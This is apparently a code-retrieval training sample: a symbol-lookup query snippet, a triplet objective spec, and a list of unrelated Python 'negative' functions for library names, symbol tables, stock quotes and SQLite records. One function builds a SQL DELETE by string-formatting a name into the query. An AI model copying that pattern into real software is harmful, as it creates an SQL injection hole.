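    ),
}

libname, symname = findSymbolByItemnum("IT-0042", libs)
print(libname, symname)  # -> passives R_0603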
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_name_with_lib(datablock):\r\n text = datablock.name\r\n if datablock.library:\r\n # text += ' (Lib: \"%s\")' % datablock.library.name\r\n text = \"L \" + text\r\n return text", "def get_symbols(doc, lib):\n\n basename = lib.replace(\".dll\", \"\").lower()\n filename = os.path.join(get_hopper_script_dir(), basename + \".txt\")\n if not os.path.exists(filename):\n doc.log(\"Symbol file not found: %s\" % filename)\n return None\n\n symbols = {}\n with open(filename, \"r\") as fp:\n for i, line in enumerate(fp, 1):\n match = symbol_line.match(line)\n if not match:\n doc.log(\"Skipping line %d: Malformed\" % i)\n continue\n\n ordinal, name = match.group(1), match.group(2)\n if ordinal and name:\n symbols[ordinal] = name\n\n return symbols", "def get_library_name(self, linker):\n return linker.get_library_name(self.__library.get_name())", "def get_material(material):\n for libn,tdict in liblist:\n if material in tdict:\n return tdict[material]\n print (material, \" not found\")\n raise KeyError", "def get_library_name(self, op):\n if op.startswith(\"/\"):\n return op\n # Check if the library is specified verbatim. If yes, no need to expand.\n if re.match(r'lib.+\\.so(\\..*)?', op):\n return op\n libname = \"lib%s.so\" % (op)\n # Shared object may be linker script, if so, it will tell actual shared object.\n for ii in self.__library_directories:\n current_libname = locate(ii, libname)\n if current_libname and file_is_ascii_text(current_libname):\n fd = open(current_libname, \"r\")\n match = re.search(r'GROUP\\s*\\(\\s*(\\S+)\\s+', fd.read(), re.MULTILINE)\n fd.close()\n if match:\n ret = os.path.basename(match.group(1))\n if is_verbose():\n print(\"Using shared library '%s' instead of '%s'.\" % (ret, libname))\n return ret\n return libname", "def flib_name(flib_path):\n raw = cmd('flib', 'view-lib', flib_path)\n info = defaultdict(str)\n for line in raw.splitlines():\n k, v = map(str.strip, line.split(':', 1))\n info[k] = v\n return '%s_%s' % (info['Tag'].replace('/', '_'), info['Name'])", "def find_material(material):\n for libn,tdict in liblist:\n if material in tdict:\n print(libn)", "def extract(self, lib):\n cmd = [self.nm_exe] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n fmt_syms = (self._extract_sym(l)\n for l in out.splitlines() if l.strip())\n # Cast symbol to string.\n final_syms = (repr(s) for s in fmt_syms if self._want_sym(s))\n # Make unique and sort strings.\n tmp_list = list(sorted(set(final_syms)))\n # Cast string back to symbol.\n return util.read_syms_from_list(tmp_list)", "def libraryName(self):\n ret=\"\"\n if self.kind == \"lib\":\n ret = self.name + \"Engine\"\n elif self.kind == \"exe\":\n ret = self.name + \"Exelib\"\n else:\n raise Invalid(\"Invalid kind of component: %s. 
Supported kinds are 'lib' and 'exe'\" % self.name)\n return ret", "def library2(self,irc,msg,args):\n company = self.pick(self.vPrefix) + \\\n self.pick(self.vMidfix) + \\\n self.pick(self.vPostfix) + \"lib\"\n product = self.pick(self.vBased) + \" \" + \\\n self.pick(self.vProd) + \" \" + \\\n self.pick(self.vVia) + \" \" + \\\n self.pick(self.vLibraryVerbs) + \" \" + \\\n self.pick(self.vLibrary)\n irc.reply(\"%s = %s\" % (company,product))", "def lookup_symbol(symbol):\n\n try:\n res = requests.get(\"https://cloud.iexapis.com/stable/stock/\" +\n f\"{urllib.parse.quote_plus(symbol)}/quote?token={Config.API_KEY}\")\n res.raise_for_status()\n except requests.RequestException:\n return None\n\n try:\n quote = res.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"],\n }\n except (KeyError, TypeError, ValueError):\n return None", "def library():\n finder = LibraryFinder()\n p = finder.find()\n return p if p else ''", "def get_number_from_symbol(symbol):\n return elements[symbol]['number']", "def instrumentLookup(instrument_df,symbol):\r\n try:\r\n return instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]\r\n except:\r\n return -1", "def lookup(symbol):\r\n \r\n # format url\r\n url = 'https://query1.finance.yahoo.com/v7/finance/options/{}'.format(symbol)\r\n \r\n # send HTTP request and JSONify\r\n page = requests.get(url, headers={'User-agent': 'Mozilla/5.0'}).json()\r\n if page['optionChain']['result'] == []:\r\n return 1\r\n \r\n # init dictionary\r\n info = {}\r\n \r\n # name\r\n try:\r\n info['name'] = page['optionChain']['result'][0]['quote']['shortName']\r\n except Exception as e:\r\n try:\r\n info['name'] = page['optionChain']['result'][0]['quote']['longName']\r\n except Exception as e:\r\n info['name'] = symbol\r\n \r\n # price\r\n try:\r\n info['price'] = page['optionChain']['result'][0]['quote']['regularMarketPrice']\r\n except Exception as e:\r\n return 2\r\n \r\n # is tradeable\r\n try:\r\n if page['optionChain']['result'][0]['quote']['quoteType'] != 'INDEX':\r\n info['tradeable'] = True\r\n except Exception as e:\r\n pass\r\n\r\n # market status\r\n try:\r\n page = page['optionChain']['result'][0]['quote']['marketState']\r\n if page != 'PRE' or page != 'NORMAL' or page != 'POST':\r\n info['marketState'] = 1\r\n except Exception as e:\r\n return 3\r\n \r\n info['symbol'] = symbol\r\n \r\n # success\r\n return info", "def _GetSymbolNameToFilename(build_directory):\n symbol_extractor.CheckLlvmNmExists()\n path = os.path.join(build_directory, 'obj')\n object_filenames = cyglog_to_orderfile.GetObjectFilenames(path)\n pool = multiprocessing.Pool()\n symbol_names_filename = zip(\n pool.map(symbol_extractor.SymbolNamesFromLlvmBitcodeFile,\n object_filenames),\n object_filenames)\n pool.close()\n result = {}\n for (symbol_names, filename) in symbol_names_filename:\n stripped_filename = filename[len(build_directory):]\n if stripped_filename.startswith('/obj/'):\n stripped_filename = stripped_filename[len('/obj/'):]\n for s in symbol_names:\n result[s] = stripped_filename\n return result", "def parse_symbol_table(data, sections, elf_header):\n if is64bit(elf_header):\n symbol_entry_str = symbol_64_entry_str\n symbol_entry_spec = symbol_64_entry_spec\n else:\n symbol_entry_str = symbol_32_entry_str\n symbol_entry_spec = symbol_32_entry_spec\n entry_len = struct.calcsize(symbol_entry_str)\n \n st_offset = None\n if \".symtab\" in sections:\n section = \".symtab\"\n if \".strtab\" in 
sections:\n st_offset = sections[\".strtab\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n elif \".dynsym\" in sections:\n section = \".dynsym\"\n if \".dynstr\" in sections:\n st_offset = sections[\".dynstr\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n \n if section not in sections:\n return {}, {} \n \n symbols = {}\n imports = {}\n offset = sections[section][\"offset\"]\n size = sections[section][\"size\"]\n index = offset\n while index < offset + size:\n vals = {}\n if len(data) < index+entry_len: \n break\n \n val_data = struct.unpack(symbol_entry_str, data[index:index+entry_len])\n for i, elem in enumerate(symbol_entry_spec):\n vals[elem[0]] = val_data[i]\n \n if st_offset is None:\n symbols[vals[\"name\"]] = vals\n else:\n func_name = get_name_from_string_table(data, st_offset, vals[\"name\"])\n if func_name:\n vals.pop(\"name\")\n vals[\"info\"] = get_symbol_info(vals[\"info\"])\n vals[\"shndx\"] = get_symbol_shndx(vals[\"shndx\"])\n \n if vals[\"info\"] == \"UNDEFINED\" and vals[\"value\"] == 0:\n tmp_name = func_name\n import_name = \"Unknown\"\n if \"@@\" in func_name:\n i = tmp_name.find(\"@@\")\n func_name = tmp_name[:i]\n import_name = tmp_name[i:].strip(\"@@\") \n if import_name not in imports:\n imports[import_name] = {}\n imports[import_name][func_name] = vals\n symbols[func_name] = vals\n \n index += entry_len \n \n return symbols, imports", "def instrumentLookup(instrument_df,symbol):\n try:\n return instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]\n except:\n return -1", "def getSymbolMap():\n name = os.path.join(os.path.dirname(__file__), 'nasdaq_nasdaqcom.csv')\n symbols = TickerSymbols(name)\n return symbols.getNameToTicker()", "def lookup(cls, _db, short_name):\n def _lookup():\n library = get_one(_db, Library, short_name=short_name)\n return library, False\n library, is_new = cls.by_cache_key(_db, short_name, _lookup)\n return library", "def number_to_name(number):\n for name, value in item_dict.items():\n if number == value:\n return name", "def get_library_name(name):\n suffix = get_sharedlib_suffix()\n if not is_windows() and name.startswith(\"lib\"):\n name = name[len(\"lib\"):]\n if suffix and name.endswith(suffix):\n name = name[:-len(suffix)]\n return name", "def _GetSymbol(atom):\n ks = atom.keys()\n if 'sym' in ks:\n return atom['sym']\n\n for k in ks:\n if k not in PROTECTED_KEYS and isinstance(atom[k], list):\n if len(atom[k]) == 3:\n return k\n\n raise ValueError", "def package_name(string):\n return 'USymbol' + convert_name(string, False)", "def lookup(symbol):\n\n # Contact API\n try:\n api_key = app.config[\"API_KEY\"]\n response = requests.get(\n f\"https://cloud-sse.iexapis.com/stable/stock/{urllib.parse.quote_plus(symbol)}/quote?token={api_key}\")\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # Parse response\n try:\n\n quote = response.json()\n\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"],\n \"isotime\": datetime.datetime.utcnow().isoformat()\n }\n\n except (KeyError, TypeError, ValueError):\n return None", "def lookup(symbol):\n\n # Contact API\n try:\n api_key = os.environ.get(\"API_KEY\")\n response = requests.get(f\"https://cloud-sse.iexapis.com/stable/stock/{urllib.parse.quote_plus(str(symbol))}/quote?token={api_key}\")\n response.raise_for_status()\n except requests.RequestException:\n flash(\"Please set API_KEY\", 'danger')\n return None\n\n # 
Parse response\n try:\n quote = response.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"],\n \"change\": quote[\"change\"],\n \"changePercent\": quote[\"changePercent\"],\n \"volume\": quote[\"volume\"],\n \"week52High\": quote[\"week52High\"],\n \"week52Low\": quote[\"week52Low\"],\n \"open\" :quote[\"open\"],\n \"high\" :quote['high'],\n \"low\" : quote[\"low\"]\n }\n except (KeyError, TypeError, ValueError):\n return None", "def get_symbol(self, name):\n if not self.ksymtab_initialized:\n self._init_ksymtab()\n for match in re.finditer('{0}\\0'.format(name), self.kernel_image[self.ksymtab_strings_offset:]):\n symbol_str_offset = self.ksymtab_strings_offset + match.start()\n if re.match(r'[0-9a-z_]', self.kernel_image[symbol_str_offset - 1:symbol_str_offset]):\n # Symbol string is a substring of another symbol string,\n # e.g. 'use_mm' is a substring of 'unuse_mm'.\n continue\n debug.debug(\"Found the physical offset of the symbol string \"\n \"'{0}': {1:#010x}\".format(name, symbol_str_offset))\n symbol_str_vaddr = symbol_str_offset + self.page_offset\n symbol_str_vaddr_little = pack('<L', symbol_str_vaddr)\n # TODO: save ksymtab_offset in the object variable\n ksymtab_offset = max(0, symbol_str_offset - KSYMTAB_MAX_SIZE) >> 2 << 2 # align to x4\n ksymtab_data = self.kernel_image[ksymtab_offset:ksymtab_offset + KSYMTAB_MAX_SIZE]\n for match in re.finditer(symbol_str_vaddr_little.encode('hex'), ksymtab_data.encode('hex')):\n ksymtab_entry_offset = ksymtab_offset + match.start() / 2 - 4\n symbol_vaddr, = unpack('<L', self.kernel_image[ksymtab_entry_offset:ksymtab_entry_offset + 4])\n debug.debug(\"Requested kernel symbol '{0}' found: {1:#010x}\".format(name, symbol_vaddr))\n return symbol_vaddr\n debug.debug(\"Requested kernel symbol '{0}' not found\".format(name))\n return None", "def lookup(quantity, __check_shortcuts=True):\n code_given = False\n name_given = False\n\n try: # assume integer-like\n code = int(quantity)\n code_given = True\n except:\n name = quantity\n name_given = True\n\n if (code_given):\n if (code in name_given_code.keys()): # code given, grab name\n return name_given_code[code]\n else:\n return None\n\n if (name_given):\n if (__check_shortcuts): # check shortcuts first\n ind = shortcut_lookup(name)\n\n if (ind is not None): # found in shortcuts\n return ind\n\n name = name.lower()\n if (name in code_given_name.keys()): # name give, grab code\n return code_given_name[name]\n else:\n return None\n\n return None", "def get_keyword(package):\n\ttry:\n\t\tsubstr = re.search(r'(\\S+)_(\\S+)', package)\n\t\tif substr:\n\t\t\treturn substr.groups()\n\texcept Exception,e:\n\t\tlog.error(str(e))\n\t\treturn None", "def _chemistryBarcodeTripleInFile(self):\n try:\n bindingKit = self.file[\"/ScanData/RunInfo\"].attrs[\"BindingKit\"]\n sequencingKit = self.file[\"/ScanData/RunInfo\"].attrs[\"SequencingKit\"]\n # version string in bas file looks like \"2.1.1.1.x\", we have to extract\n # the \"2.1\"\n tmp = self.file[\"/PulseData/BaseCalls\"].attrs[\"ChangeListID\"]\n swVersion= \".\".join(tmp.split(\".\")[0:2])\n return (bindingKit, sequencingKit, swVersion)\n except:\n return None", "def _get_lib_info(*, full_name=None, lib_path=None):\n if full_name is None:\n # get it from the lib_path\n try:\n libsdir, charmsdir, importable_charm_name, v_api = lib_path.parts[:-1]\n except ValueError:\n raise _BadLibraryPathError(lib_path)\n if libsdir != \"lib\" or charmsdir != \"charms\" or lib_path.suffix != 
\".py\":\n raise _BadLibraryPathError(lib_path)\n full_name = \".\".join((charmsdir, importable_charm_name, v_api, lib_path.stem))\n\n else:\n # build the path! convert a lib name with dots to the full path, including lib\n # dir and Python extension.\n # e.g.: charms.mycharm.v4.foo -> lib/charms/mycharm/v4/foo.py\n try:\n charmsdir, importable_charm_name, v_api, libfile = full_name.split(\".\")\n except ValueError:\n raise _BadLibraryNameError(full_name)\n if charmsdir != \"charms\":\n raise _BadLibraryNameError(full_name)\n path = pathlib.Path(\"lib\")\n lib_path = path / charmsdir / importable_charm_name / v_api / (libfile + \".py\")\n\n # charm names in the path can contain '_' to be importable\n # these should be '-', so change them back\n charm_name = create_charm_name_from_importable(importable_charm_name)\n\n if v_api[0] != \"v\" or not v_api[1:].isdigit():\n raise CommandError(\n \"The API version in the library path must be 'vN' where N is an integer.\"\n )\n api_from_path = int(v_api[1:])\n\n lib_name = lib_path.stem\n if not lib_path.exists():\n return LibData(\n lib_id=None,\n api=api_from_path,\n patch=-1,\n content_hash=None,\n content=None,\n full_name=full_name,\n path=lib_path,\n lib_name=lib_name,\n charm_name=charm_name,\n )\n\n # parse the file and extract metadata from it, while hashing\n metadata_fields = (b\"LIBAPI\", b\"LIBPATCH\", b\"LIBID\")\n metadata = dict.fromkeys(metadata_fields)\n hasher = hashlib.sha256()\n with lib_path.open(\"rb\") as fh:\n for line in fh:\n if line.startswith(metadata_fields):\n try:\n field, value = [x.strip() for x in line.split(b\"=\")]\n except ValueError:\n raise CommandError(\n \"Bad metadata line in {!r}: {!r}\".format(str(lib_path), line)\n )\n metadata[field] = value\n else:\n hasher.update(line)\n\n missing = [k.decode(\"ascii\") for k, v in metadata.items() if v is None]\n if missing:\n raise CommandError(\n \"Library {!r} is missing the mandatory metadata fields: {}.\".format(\n str(lib_path), \", \".join(sorted(missing))\n )\n )\n\n bad_api_patch_msg = \"Library {!r} metadata field {} is not zero or a positive integer.\"\n try:\n libapi = _get_positive_int(metadata[b\"LIBAPI\"])\n except ValueError:\n raise CommandError(bad_api_patch_msg.format(str(lib_path), \"LIBAPI\"))\n try:\n libpatch = _get_positive_int(metadata[b\"LIBPATCH\"])\n except ValueError:\n raise CommandError(bad_api_patch_msg.format(str(lib_path), \"LIBPATCH\"))\n\n if libapi == 0 and libpatch == 0:\n raise CommandError(\n \"Library {!r} metadata fields LIBAPI and LIBPATCH cannot both be zero.\".format(\n str(lib_path)\n )\n )\n\n if libapi != api_from_path:\n raise CommandError(\n \"Library {!r} metadata field LIBAPI is different from the version in the path.\".format(\n str(lib_path)\n )\n )\n\n bad_libid_msg = \"Library {!r} metadata field LIBID must be a non-empty ASCII string.\"\n try:\n libid = ast.literal_eval(metadata[b\"LIBID\"].decode(\"ascii\"))\n except (ValueError, UnicodeDecodeError):\n raise CommandError(bad_libid_msg.format(str(lib_path)))\n if not libid or not isinstance(libid, str):\n raise CommandError(bad_libid_msg.format(str(lib_path)))\n\n content_hash = hasher.hexdigest()\n content = lib_path.read_text()\n\n return LibData(\n lib_id=libid,\n api=libapi,\n patch=libpatch,\n content_hash=content_hash,\n content=content,\n full_name=full_name,\n path=lib_path,\n lib_name=lib_name,\n charm_name=charm_name,\n )", "def examineLoadLibrary(lib):\n from PyJobTransformsCore.envutil import examine_library\n\n # turn module name into library 
name\n if not lib.startswith('lib') and not lib.endswith('.so'):\n lib = 'lib' + lib + '.so'\n print (\"Examining library \" + lib)\n diagLines = []\n errorAcronym = None\n missingSystemLibs = []\n missingOtherLibs = []\n misLibs = examine_library(lib)\n for l in misLibs:\n if systemLibsRE.search(l):\n missingSystemLibs.append(l)\n else:\n missingOtherLibs.append(l)\n if missingSystemLibs:\n if len(missingSystemLibs) == 1: libWord = 'library'\n else: libWord = 'libraries'\n diagLines.append( 'Site problem: Missing system %s: %s' % (libWord, ','.join(missingSystemLibs)) )\n if not errorAcronym: errorAcronym = \"ATH_SITE_SYSLIBS\"\n\n if missingOtherLibs:\n if len(missingOtherLibs) == 1: libWord = 'library'\n else: libWord = 'libraries'\n diagLines.append( 'Can not find %s: %s Please check software installation.' % (libWord,','.join(missingOtherLibs)) )\n if not errorAcronym: errorAcronym = \"ATH_SITE_LIBS\"\n return (errorAcronym,os.linesep.join(diagLines))", "def _parseKeyNames(lib):\n _keyNames = {}\n for attr in dir(lib): # from the modules variables\n if attr[:6] == 'TCODK_': # get the K_* constants\n _keyNames[getattr(lib, attr)] = attr[6:] # and make CODE=NAME pairs\n return _keyNames", "def symbol(self, **kw):\n if not kw:\n raise ValueError(u\"'symbol' needs keyword arguments\")\n res = self.find_symbols(**kw)\n if len(res)==1:\n return res[0]\n else:\n return res", "def _symbol(self,s):\n return self.symbollist[s%len(self.symbollist)]", "def lookup(symbol):\n\n # Contact API\n try:\n api_key = os.environ.get(\"API_KEY\")\n symbol = urllib.parse.quote_plus(symbol)\n url = f\"https://cloud-sse.iexapis.com/stable/stock/{symbol}/quote?token={api_key}\"\n response = requests.get(url)\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # Parse response\n try:\n quote = response.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"]\n }\n except (KeyError, TypeError, ValueError):\n return None", "def prepareTextLibrary(self, itemId, libId, libData):\n funcName = libData['data']['function']\n libName = libData['data']['main-name']\n\n funcRet = \"\"\n if len(libData['data']['obj']) >= 1:\n funcArgType = \"%s\" % libData['data']['obj'][0]['selected-type']\n funcArg = \"%s\" % libData['data']['obj'][0]['value']\n else:\n funcArg = \"\"\n funcArgType = \"\"\n\n if 'return-value' in libData['data']:\n if libData['data']['return-value'] == 'True':\n funcRet = \"ACTION%s = \" % itemId\n\n if len(funcArg):\n funcArgParsed = self.__parseValue(val=funcArg)\n textItem = \"%s %s #%s\\n%s\\n%s: %s\" % (funcRet, libName, libId, funcName, funcArgType, funcArgParsed)\n else:\n textItem = \"%s %s #%s\\n%s\" % (funcRet, libName, libId, funcName)\n\n return textItem", "def display_library_info():\n print \"in display library info \\n\"\n library_list = model.get_libraries_info(model.db_session, session)\n return render_template('library.html', libraries=library_list)", "def lookup_symbol(self, symbol):\n if symbol is None:\n raise TypeError(\"Cannot lookup asset for symbol of None\")\n\n mapping = self.symbol_ownership_map\n\n # split the symbol into the components, if there are no\n # company/share class parts then share_class_symbol will be empty\n company_symbol, share_class_symbol = split_delimited_symbol(symbol)\n try:\n owners = mapping[company_symbol, share_class_symbol]\n assert owners, 'empty owners list for %r' % symbol\n except KeyError:\n # no equity has ever held this symbol\n raise 
SymbolNotFound(symbol=symbol)\n\n # exactly one equity has ever held this symbol\n if len(owners) == 1:\n return self.retrieve_asset(owners[0].sid)\n\n options = {self.retrieve_asset(owner.sid) for owner in owners}\n\n # more than one equity has held this ticker, this\n # is ambiguous\n raise MultipleSymbolsFound(symbol=symbol, options=options)", "def lookup (barcode, ID_TYPES=['ISBN', 'UPC','EAN']):\n\n matches = [] # list of {'desc', 'sku', 'type', 'vnd'}\n\n for idtype in ID_TYPES:\n try:\n result = api.item_lookup(barcode, SearchIndex='All', IdType=idtype)\n for item in result.Items.Item:\n if not _is_duplicate(item.ASIN, matches):\n matches.append({'desc': unicode(item.ItemAttributes.Title),\n 'sku': unicode(item.ASIN),\n 'type': idtype,\n 'vnd': 'AMZN:'+AMZLOCALE}) # vendor id\n\n except (errors.InvalidAccount, errors.InvalidClientTokenId, errors.MissingClientTokenId):\n print >>sys.stderr, \"Amazon Product API lookup: bad account credentials\"\n\n except errors.TooManyRequests, toomanyerr:\n print >>sys.stderr, \"Amazon Product API lookup error:\", toomanyerr\n\n except errors.InternalError, awserr:\n print >>sys.stderr, \"Amazon Product API lookup error:\", awserr\n\n except errors.InvalidParameterValue:\n # this simply means the barcode\n # does not exist for the given type,\n # so no need to do anything explicit\n pass\n\n return matches", "def _load_symbol(self, index):\n # Load basic information\n name, dim, type_code = self._api.symbol_info(index)\n n_records, vartype, desc = self._api.symbol_info_x(index)\n\n self._index[index] = name # Record the name\n\n attrs = {\n 'index': index,\n 'name': name,\n 'dim': dim,\n 'type_code': type_code,\n 'records': n_records,\n 'vartype': vartype,\n 'description': desc,\n }\n\n # Assemble a string description of the Symbol's type\n type_str_ = type_str[type_code]\n if type_code == gdxcc.GMS_DT_PAR and dim == 0:\n type_str_ = 'scalar'\n try:\n vartype_str_ = vartype_str[vartype]\n except KeyError: # pragma: no cover\n # Some other vartype is returned that's not described by the GDX\n # API docs\n vartype_str_ = ''\n attrs['type_str'] = '{} {}'.format(vartype_str_, type_str_)\n\n debug(str('Loading #{index} {name}: {dim}-D, {records} records, '\n u'\"{description}\"').format(**attrs))\n\n # Equations and Aliases require limited processing\n if type_code == gdxcc.GMS_DT_EQU:\n info('Loading of GMS_DT_EQU not implemented: {} {} not loaded.'.\n format(index, name))\n self._state[name] = None\n return name, type_code\n elif type_code == gdxcc.GMS_DT_ALIAS:\n parent = desc.replace('Aliased with ', '')\n self._alias[name] = parent\n assert self[parent].attrs['_gdx_type_code'] == gdxcc.GMS_DT_SET\n # Duplicate the variable\n self._variables[name] = self._variables[parent]\n self._state[name] = True\n super(File, self).set_coords(name, inplace=True)\n return name, type_code\n\n # The Symbol is either a Set, Parameter or Variable\n try: # Read the domain, as a list of names\n domain = self._api.symbol_get_domain_x(index)\n debug('domain: {}'.format(domain))\n except Exception: # gdxSymbolGetDomainX fails for the universal set\n assert name == '*'\n domain = []\n\n # Cache the attributes\n attrs['domain'] = domain\n self._state[name] = {'attrs': attrs}\n\n return name, type_code", "def read_package_variable(key):\n module_path = os.path.join(PACKAGE_NAME, '__init__.py')\n with open(module_path) as module:\n for line in module:\n parts = line.strip().split(' ')\n if parts and parts[0] == key:\n return parts[-1].strip(\"'\")\n raise KeyError(\"'{0}' not 
found in '{1}'\".format(key, module_path))", "def isbn_lookup(isbn):\n base = \"https://www.googleapis.com/books/v1/volumes?q=isbn=\"\n# Unfortunately we can't use the superior \"with spam as eggs\" syntax here...\n search = urlopen(base + isbn + \"&prettyprint=false\")\n lines = search.read()\n search.close()\n for bool_pair in [(\"false\", \"False\"), (\"true\", \"True\")]:\n lines = lines.replace(*bool_pair)\n volume_info = literal_eval(lines)[\"items\"][0][\"volumeInfo\"]\n title = volume_info[\"title\"]\n authors = ', '.join(a for a in volume_info[\"authors\"])\n return \"Title:\\t\\t%s\\nAuthor(s):\\t%s\" % (title, authors)", "def itemnames():\n g = ['KIS_NA_39', 'VII_57', 'MX_48', 'MX_56', 'KIS_NA_42', 'VII_54',\n 'MX_S_48', 'MX_S_52', 'MX_52', 'KIS_NA_45', 'KIS_NA_51', 'MIP_45',\n 'MIP_49', 'MIP_52', 'MIP_plus_48', 'MIP_plus_51', 'MX_42', 'MX_45',\n 'MIP_G_42', 'KIS_42', 'KIS_NA_48']\n return(g)", "def read_package_variable(key):\n module_path = os.path.join(PACKAGE_NAME, '__init__.py')\n with open(module_path) as module:\n for line in module:\n parts = line.strip().split(' ')\n if parts and parts[0] == key:\n return parts[-1].strip(\"'\")\n assert 0, \"'{0}' not found in '{1}'\".format(key, module_path)", "def libraryName(self):\n return _osgAnimation.VertexInfluenceMap_libraryName(self)", "def genLibData(self):\n import mush\n tsMain = string.Template(mush.libGenMain)\n tsIfAltId = string.Template(mush.libGenIfAltId)\n #--Data Records\n for id in ('lib_action','lib_actionCount'):\n glob = self.getRecord('GLOB',id,Glob)\n (glob.type, glob.value) = ('s',0)\n glob.setChanged()\n setAllCode = 'begin lib_setAllGS\\n'\n setNoneCode = 'begin lib_setNoneGS\\n'\n for libId in self.libList:\n (srcId,altId) = self.libMap[libId]\n srcBook = self.srcBooks.get(srcId)[0]\n if not srcBook:\n print '%s: Missing source: %s' % (libId,srcId)\n continue\n #--Global\n glob = self.getRecord('GLOB',libId+'G',Glob)\n (glob.type, glob.value) = ('s',0)\n glob.setChanged()\n #--Script\n scriptId = libId+'LS'\n script = self.getRecord('SCPT',scriptId,Scpt)\n scriptCode = tsMain.substitute(\n libId=libId, srcId=srcId, ifAltId=(\n (altId and tsIfAltId.substitute(libId=libId,altId=altId)) or ''))\n script.setCode(scriptCode)\n script.setChanged()\n #--Book\n srcBook.load(unpack=True)\n book = self.getRecord('BOOK',libId,Book)\n book.model = srcBook.model\n book.title = srcBook.title\n book.icon = srcBook.icon\n book.text = srcBook.text\n book.script = scriptId\n book.setChanged()\n #--Set Scripts\n setAllCode += 'set %sG to 1\\n' % (libId,)\n setNoneCode += 'set %sG to 0\\n' % (libId,)\n #--Set scripts\n for id,code in (('lib_setAllGS',setAllCode),('lib_setNoneGS',setNoneCode)):\n code += ';--Done\\nstopScript %s\\nend\\n' % (id,)\n script = self.getRecord('SCPT',id,Scpt)\n script.setCode(code)\n script.setChanged()", "def read_package_variable(key):\n module_path = os.path.join(PACKAGE_NAME, '__init__.py')\n with open(module_path) as module:\n for line in module:\n parts = line.strip().split(' ')\n if parts and parts[0] == key:\n return parts[-1].strip(\"'\")\n assert False, \"'{0}' not found in '{1}'\".format(key, module_path)", "def getLibraryName():\n return _libsbml.XMLOutputStream_getLibraryName()", "def lib_name(interface: str, simulator: str) -> str:\n\n interface_name = interface.lower()\n supported_interfaces = [\"vpi\", \"vhpi\", \"fli\"]\n if interface_name not in supported_interfaces:\n raise ValueError(\n \"Wrong interface used. 
Supported: \" + \", \".join(supported_interfaces)\n )\n\n simulator_name = simulator.lower()\n supported_sims = [\n \"icarus\",\n \"questa\",\n \"modelsim\",\n \"ius\",\n \"xcelium\",\n \"vcs\",\n \"ghdl\",\n \"riviera\",\n \"activehdl\",\n \"cvc\",\n ]\n if simulator not in supported_sims:\n raise ValueError(\n \"Wrong simulator name. Supported: \" + \", \".join(supported_sims)\n )\n\n if simulator_name in [\"questa\", \"cvc\"]:\n library_name = \"modelsim\"\n elif simulator_name == \"xcelium\":\n library_name = \"ius\"\n elif simulator_name in [\"riviera\", \"activehdl\"]:\n library_name = \"aldec\"\n else:\n library_name = simulator_name\n\n if library_name == \"icarus\":\n lib_ext = \"\"\n elif os.name == \"nt\":\n lib_ext = \".dll\"\n else:\n lib_ext = \".so\"\n\n # check if compiled with msvc\n if os.path.isfile(os.path.join(libs_dir, \"cocotb.dll\")):\n lib_prefix = \"\"\n else:\n lib_prefix = \"lib\"\n\n return lib_prefix + \"cocotb\" + interface_name + \"_\" + library_name + lib_ext", "def get_libraries(name_only=False):\n\n libs = list()\n\n dtf_db = sqlite3.connect(DTF_DB)\n cur = dtf_db.cursor()\n\n # This just returns the name\n if name_only:\n\n sql = ('SELECT name '\n 'FROM libraries ')\n\n for lib in cur.execute(sql):\n libs.append(lib[0])\n\n # This returns a list of items\n else:\n\n sql = ('SELECT name, version, '\n 'about, author '\n 'FROM libraries '\n 'ORDER BY name')\n\n cur.execute(sql)\n\n while True:\n\n item = dtf.core.item.Item()\n line = cur.fetchone()\n if line is None:\n break\n\n item.type = dtf.core.item.TYPE_LIBRARY\n item.name = line[0]\n item.version = line[1]\n item.about = line[2]\n item.author = line[3]\n\n libs.append(item)\n\n return libs", "def _get_info(self, fullmodname):\n parts = fullmodname.split('.')\n submodname = parts[-1]\n modpath = '/'.join(parts)\n for suffix, is_package in _SEARCH_ORDER:\n relpath = modpath + suffix\n try:\n self.datablocks[relpath]\n except KeyError:\n pass\n else:\n return submodname, is_package, relpath\n msg = ('Can\\'t find module %s in .blend %r' %\n (fullmodname, self.path_entry))\n ##logging.debug(msg)\n raise BlendImportError(msg)", "def find_symbol(self) -> str:\n pattern = struct.pack(\"<HBBBBHQ\", self.event_id, self.version, self.channel, self.level, self.opcode, self.task, self.keyword)\n for start, end in find_segment(self._bv, \".rentries\"):\n offset = self._bv.read(start, end - start).find(pattern)\n if offset == -1:\n continue\n\n symbol = self._bv.get_symbol_at(start + offset)\n if symbol is None:\n continue\n \n return symbol.name\n\n return None", "def find_app(app, symbol_by_name=..., imp=...):\n ...", "def lookup(match):\n word = match.group(0)\n return symtab[unbase(word)] or word", "def __update_library(item):\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM libraries '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n\n entry = [(item.name, item.version, item.author,\n item.install_name)]\n\n # Update a Library Entry\n sql = ('INSERT INTO libraries (name, version, '\n 'author, install_name)'\n 'VALUES (?, ?, ?, ?)')\n\n cur.executemany(sql, entry)\n conn.commit()\n\n return cur.rowcount", "def lookup(name):", "def lookup(name):", "def find_book(code: str) -> Dict:\n pass", "def iteminfo():\n itemcode = input(\"Enter item code: \")\n if itemcode in FULLINVENTORY:\n printdict = FULLINVENTORY[itemcode]\n for key, value in printdict.items():\n print(\"{}:{}\".format(key, value))\n else:\n print(\"Item not found in inventory\")", 
